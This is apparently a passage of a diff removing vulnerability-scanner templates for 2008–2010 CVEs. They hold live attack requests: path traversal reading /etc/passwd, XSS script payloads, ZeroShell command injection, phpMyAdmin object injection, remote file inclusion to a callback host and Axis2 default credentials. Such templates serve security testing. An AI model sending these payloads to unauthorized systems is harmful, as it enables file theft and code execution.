tags: cve2008,nweb2fax,lfi,traversal,edb,cve
requests:
- method: GET
path:
- "{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd"
- "{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

View File

@ -1,43 +0,0 @@
id: CVE-2008-6982
info:
name: Devalcms 1.4a - Cross-Site Scripting
author: arafatansari
severity: high
description: |
Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file.
reference:
- https://www.exploit-db.com/exploits/6369
- http://sourceforge.net/projects/devalcms/files/devalcms/devalcms-1.4b/devalcms-1.4b.zip/download
- https://nvd.nist.gov/vuln/detail/CVE-2008-6982
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2008-6982
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2008,devalcms,xss,cms,edb
requests:
- method: GET
path:
- '{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'sub menu for: <script>alert(document.domain)</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 500
# Enhanced by md on 2022/09/20

View File

@ -1,31 +0,0 @@
id: CVE-2009-0545
info:
name: ZeroShell <= 1.0beta11 Remote Code Execution
author: geeknik
severity: critical
description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action.
reference:
- https://www.exploit-db.com/exploits/8023
- https://nvd.nist.gov/vuln/detail/CVE-2009-0545
- http://www.zeroshell.net/eng/announcements/
- http://www.ikkisoft.com/stuff/LC-2009-01.txt
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
cvss-score: 10
cve-id: CVE-2009-0545
cwe-id: CWE-20
tags: edb,cve,cve2009,zeroshell,kerbynet,rce
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/04/18

View File

@ -1,36 +0,0 @@
id: CVE-2009-0932
info:
name: Horde/Horde Groupware - Local File Inclusion
author: pikpikcu
severity: high
description: Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
reference:
- https://www.exploit-db.com/exploits/16154
- http://cvs.horde.org/co.php/groupware/docs/groupware/CHANGES?r=1.28.2.5
- http://web.archive.org/web/20161228102217/http://secunia.com/advisories/33695
- https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2009-0932
cwe-id: CWE-22
tags: cve,cve2009,horde,lfi,traversal,edb
requests:
- method: GET
path:
- "{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

View File

@ -1,42 +0,0 @@
id: CVE-2009-1151
info:
name: PhpMyAdmin Scripts - Remote Code Execution
author: princechaddha
severity: critical
description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
reference:
- https://www.phpmyadmin.net/security/PMASA-2009-3/
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
- http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301
- http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
- https://nvd.nist.gov/vuln/detail/CVE-2009-1151
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2009-1151
cwe-id: CWE-77
tags: deserialization,kev,vulhub,cve,cve2009,phpmyadmin,rce
requests:
- raw:
- |
POST /scripts/setup.php HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Content-Type: application/x-www-form-urlencoded
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/07/06

View File

@ -1,36 +0,0 @@
id: CVE-2009-1496
info:
name: Joomla! Cmimarketplace 0.1 - Local File Inclusion
author: daffainfo
severity: high
description: |
Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8367
- http://web.archive.org/web/20210121190149/https://www.securityfocus.com/bid/34431/
- https://nvd.nist.gov/vuln/detail/CVE-2009-1496
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2009-1496
cwe-id: CWE-22
tags: joomla,lfi,edb,cve,cve2009
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

View File

@ -1,36 +0,0 @@
id: CVE-2009-1558
info:
name: Cisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion
author: daffainfo
severity: high
description: Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
reference:
- https://www.exploit-db.com/exploits/32954
- https://web.archive.org/web/20210119151410/http://www.securityfocus.com/bid/34713
- http://www.vupen.com/english/advisories/2009/1173
- http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/
- https://nvd.nist.gov/vuln/detail/CVE-2009-1558
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2009-1558
cwe-id: CWE-22
tags: cve,iot,linksys,camera,traversal,cve2009,lfi,cisco,firmware,edb
requests:
- method: GET
path:
- "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

View File

@ -1,45 +0,0 @@
id: CVE-2009-1872
info:
name: Adobe Coldfusion <=8.0.1 - Cross-Site Scripting
author: princechaddha
severity: medium
description: Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
reference:
- https://web.archive.org/web/20201208121904/https://www.securityfocus.com/archive/1/505803/100/0/threaded
- https://www.tenable.com/cve/CVE-2009-1872
- http://www.adobe.com/support/security/bulletins/apsb09-12.html
- http://www.dsecrg.com/pages/vul/show.php?id=122
- https://nvd.nist.gov/vuln/detail/CVE-2009-1872
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cve-id: CVE-2009-1872
cwe-id: CWE-79
cvss-score: 4.3
metadata:
shodan-query: http.component:"Adobe ColdFusion"
verified: "true"
tags: cve,cve2009,adobe,xss,coldfusion,tenable
requests:
- method: GET
path:
- '{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/08/12

View File

@ -1,36 +0,0 @@
id: CVE-2009-2015
info:
name: Joomla! MooFAQ 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).
reference:
- https://www.exploit-db.com/exploits/8898
- http://web.archive.org/web/20210121191105/https://www.securityfocus.com/bid/35259/
- http://www.vupen.com/english/advisories/2009/1530
- https://nvd.nist.gov/vuln/detail/CVE-2009-2015
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2009-2015
cwe-id: CWE-22
tags: joomla,lfi,edb,cve,cve2009
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

View File

@ -1,36 +0,0 @@
id: CVE-2009-2100
info:
name: Joomla! JoomlaPraise Projectfork 2.0.10 - Local File Inclusion
author: daffainfo
severity: high
description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8946
- http://web.archive.org/web/20210121191226/https://www.securityfocus.com/bid/35378/
- https://nvd.nist.gov/vuln/detail/CVE-2009-2100
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2009-2100
cwe-id: CWE-22
tags: cve,cve2009,joomla,lfi,edb
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

View File

@ -1,36 +0,0 @@
id: CVE-2009-3053
info:
name: Joomla! Agora 3.0.0b - Local File Inclusion
author: daffainfo
severity: high
description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.
reference:
- https://www.exploit-db.com/exploits/9564
- https://web.archive.org/web/20210120183330/https://www.securityfocus.com/bid/36207/
- https://exchange.xforce.ibmcloud.com/vulnerabilities/52964
- https://nvd.nist.gov/vuln/detail/CVE-2009-3053
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2009-3053
cwe-id: CWE-22
tags: cve,cve2009,joomla,lfi,edb
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

View File

@ -1,36 +0,0 @@
id: CVE-2009-3318
info:
name: Joomla! Roland Breedveld Album 1.14 - Local File Inclusion
author: daffainfo
severity: high
description: Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/9706
- https://nvd.nist.gov/vuln/detail/CVE-2009-3318
- https://web.archive.org/web/20210121192413/https://www.securityfocus.com/bid/36441/
- http://www.exploit-db.com/exploits/9706
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cve-id: CVE-2009-3318
cwe-id: CWE-22
cvss-score: 7.5
tags: joomla,lfi,edb,cve,cve2009
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/08

View File

@ -1,36 +0,0 @@
id: CVE-2009-4202
info:
name: Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion
author: daffainfo
severity: high
description: Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8870
- http://www.vupen.com/english/advisories/2009/1494
- https://nvd.nist.gov/vuln/detail/CVE-2009-4202
- http://web.archive.org/web/20210121191031/https://www.securityfocus.com/bid/35201/
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2009-4202
cwe-id: CWE-22
tags: cve2009,joomla,lfi,photo,edb,cve
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/08

View File

@ -1,36 +0,0 @@
id: CVE-2009-4223
info:
name: KR-Web <=1.1b2 - Remote File Inclusion
author: geeknik
severity: high
description: KR-Web 1.1b2 and prior contain a remote file inclusion vulnerability via adm/krgourl.php, which allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter.
reference:
- https://sourceforge.net/projects/krw/
- https://www.exploit-db.com/exploits/10216
- https://exchange.xforce.ibmcloud.com/vulnerabilities/54395
- http://www.exploit-db.com/exploits/10216
- https://nvd.nist.gov/vuln/detail/CVE-2009-4223
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cve-id: CVE-2009-4223
cwe-id: CWE-94
cvss-score: 7.5
tags: cve,cve2009,krweb,rfi,edb
requests:
- method: GET
path:
- "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: interactsh_protocol
words:
- "http"
# Enhanced by mp on 2022/06/06

View File

@ -1,37 +0,0 @@
id: CVE-2009-4679
info:
name: Joomla! Portfolio Nexus - Remote File Inclusion
author: daffainfo
severity: high
description: |
Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/33440
- https://nvd.nist.gov/vuln/detail/CVE-2009-4679
- http://web.archive.org/web/20140722130146/http://secunia.com/advisories/37760/
- http://www.exploit-db.com/exploits/10754
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cve-id: CVE-2009-4679
cwe-id: CWE-22
cvss-score: 7.5
tags: cve,cve2009,joomla,lfi,nexus,edb
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/08

View File

@ -1,31 +0,0 @@
id: CVE-2009-5020
info:
name: AWStats < 6.95 - Open Redirect
author: pdteam
severity: medium
description: An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2009-5020
- http://awstats.sourceforge.net/docs/awstats_changelog.txt
remediation: Apply all relevant security patches and product upgrades.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2009-5020
cwe-id: CWE-601
tags: cve,cve2009,redirect,awstats
requests:
- method: GET
path:
- '{{BaseURL}}/awstats/awredir.pl?url=interact.sh'
- '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh'
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
# Enhanced by mp on 2022/02/13

View File

@ -1,33 +0,0 @@
id: CVE-2009-5114
info:
name: WebGlimpse 2.18.7 - Directory Traversal
author: daffainfo
severity: high
description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
reference:
- https://www.exploit-db.com/exploits/36994
- https://nvd.nist.gov/vuln/detail/CVE-2009-5114
- http://websecurity.com.ua/2628/
- https://exchange.xforce.ibmcloud.com/vulnerabilities/74321
remediation: Apply all relevant security patches and product upgrades.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cve-id: CVE-2009-5114
cwe-id: CWE-22
cvss-score: 5.0
tags: edb,cve,cve2009,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13

View File

@ -1,33 +0,0 @@
id: CVE-2010-0157
info:
name: Joomla! Component com_biblestudy - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
reference:
- https://www.exploit-db.com/exploits/10943
- https://nvd.nist.gov/vuln/detail/CVE-2010-0157
- http://web.archive.org/web/20151023032409/http://secunia.com/advisories/37896/
- http://packetstormsecurity.org/1001-exploits/joomlabiblestudy-lfi.txt
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cve-id: CVE-2010-0157
cwe-id: CWE-22
cvss-score: 7.5
tags: cve,cve2010,joomla,lfi,edb,packetstorm
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13

View File

@ -1,56 +0,0 @@
id: CVE-2010-0219
info:
name: Apache Axis2 Default Login
author: pikpikcu
severity: high
description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2010-0219
- https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html
- http://www.rapid7.com/security-center/advisories/R7-0037.jsp
- http://www.vupen.com/english/advisories/2010/2673
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
cvss-score: 10
cve-id: CVE-2010-0219
cwe-id: CWE-255
metadata:
shodan-query: http.html:"Apache Axis"
tags: cve,cve2010,axis,apache,default-login,axis2
requests:
- raw:
- |
POST /axis2-admin/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
loginUsername={{username}}&loginPassword={{password}}
- |
POST /axis2/axis2-admin/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
userName={{username}}&password={{password}}&submit=+Login+
payloads:
username:
- admin
password:
- axis2
attack: pitchfork
matchers-condition: and
matchers:
- type: word
words:
- "<h1>Welcome to Axis2 Web Admin Module !!</h1>"
- type: status
status:
- 200
# Enhanced by mp on 2022/03/02

View File

@ -1,33 +0,0 @@
id: CVE-2010-0467
info:
name: Joomla! Component CCNewsLetter - Local File Inclusion
author: daffainfo
severity: medium
description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
reference:
- https://www.exploit-db.com/exploits/11282
- https://nvd.nist.gov/vuln/detail/CVE-2010-0467
- http://web.archive.org/web/20210121194037/https://www.securityfocus.com/bid/37987/
- http://www.chillcreations.com/en/blog/ccnewsletter-joomla-newsletter/ccnewsletter-106-security-release.html
remediation: Apply all relevant security patches and upgrades.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.8
cve-id: CVE-2010-0467
cwe-id: CWE-22
tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13

View File

@ -1,34 +0,0 @@
id: CVE-2010-0696
info:
name: Joomla! Component Jw_allVideos - Arbitrary File Retrieval
author: daffainfo
severity: high
description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/11447
- https://nvd.nist.gov/vuln/detail/CVE-2010-0696
- http://web.archive.org/web/20140805102632/http://secunia.com/advisories/38587/
- http://www.joomlaworks.gr/content/view/77/34/
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2010-0696
cwe-id: CWE-22
tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13

View File

@ -1,33 +0,0 @@
id: CVE-2010-0759
info:
name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
reference:
- https://www.exploit-db.com/exploits/11498
- https://nvd.nist.gov/vuln/detail/CVE-2010-0759
- http://web.archive.org/web/20151104183037/http://secunia.com/advisories/38637/
- http://web.archive.org/web/20210121194344/https://www.securityfocus.com/bid/38296/
remediation: Upgrade to a supported version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2010-0759
cwe-id: CWE-22
tags: cve,cve2010,joomla,lfi,plugin,edb
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13

View File

@ -1,32 +0,0 @@
id: CVE-2010-0942
info:
name: Joomla! Component com_jvideodirect - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11089
- https://nvd.nist.gov/vuln/detail/CVE-2010-0942
- http://packetstormsecurity.org/1001-exploits/joomlajvideodirect-traversal.txt
remediation: Apply all relevant security patches and product upgrades.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2010-0942
cwe-id: CWE-22
tags: cve2010,joomla,lfi,edb,packetstorm,cve
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13

View File

@ -1,33 +0,0 @@
id: CVE-2010-0943
info:
name: Joomla! Component com_jashowcase - Directory Traversal
author: daffainfo
severity: high
description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
reference:
- https://www.exploit-db.com/exploits/11090
- https://nvd.nist.gov/vuln/detail/CVE-2010-0943
- http://web.archive.org/web/20210121193737/https://www.securityfocus.com/bid/37692/
- http://web.archive.org/web/20140724215426/http://secunia.com/advisories/33486/
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2010-0943
cwe-id: CWE-22
tags: cve2010,joomla,lfi,edb,cve
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/03/30

View File

@ -1,33 +0,0 @@
id: CVE-2010-0944
info:
name: Joomla! Component com_jcollection - Directory Traversal
author: daffainfo
severity: high
description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11088
- https://nvd.nist.gov/vuln/detail/CVE-2010-0944
- http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt
- http://www.exploit-db.com/exploits/11088
remediation: Apply all relevant security patches and product upgrades.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2010-0944
cwe-id: CWE-22
tags: cve2010,joomla,lfi,edb,packetstorm,cve
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13

View File

@ -1,33 +0,0 @@
id: CVE-2010-0972
info:
name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11738
- https://nvd.nist.gov/vuln/detail/CVE-2010-0972
- http://web.archive.org/web/20140804152652/http://secunia.com/advisories/38925/
- http://www.exploit-db.com/exploits/11738
remediation: Apply all relevant security patches and product upgrades.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2010-0972
cwe-id: CWE-22
tags: edb,cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13

View File

@ -1,33 +0,0 @@
id: CVE-2010-0982
info:
name: Joomla! Component com_cartweberp - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/10942
- https://nvd.nist.gov/vuln/detail/CVE-2010-0982
- http://web.archive.org/web/20210121193625/https://www.securityfocus.com/bid/37581/
- http://web.archive.org/web/20151104182451/http://secunia.com/advisories/37917/
remediation: Apply all relevant security patches and product upgrades.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2010-0982
cwe-id: CWE-22
tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/13

View File

@ -1,33 +0,0 @@
id: CVE-2010-0985
info:
name: Joomla! Component com_abbrev - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/10948
- https://nvd.nist.gov/vuln/detail/CVE-2010-0985
- http://web.archive.org/web/20210623092041/https://www.securityfocus.com/bid/37560
- http://www.exploit-db.com/exploits/10948
remediation: Apply all relevant security patches and product upgrades.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2010-0985
cwe-id: CWE-22
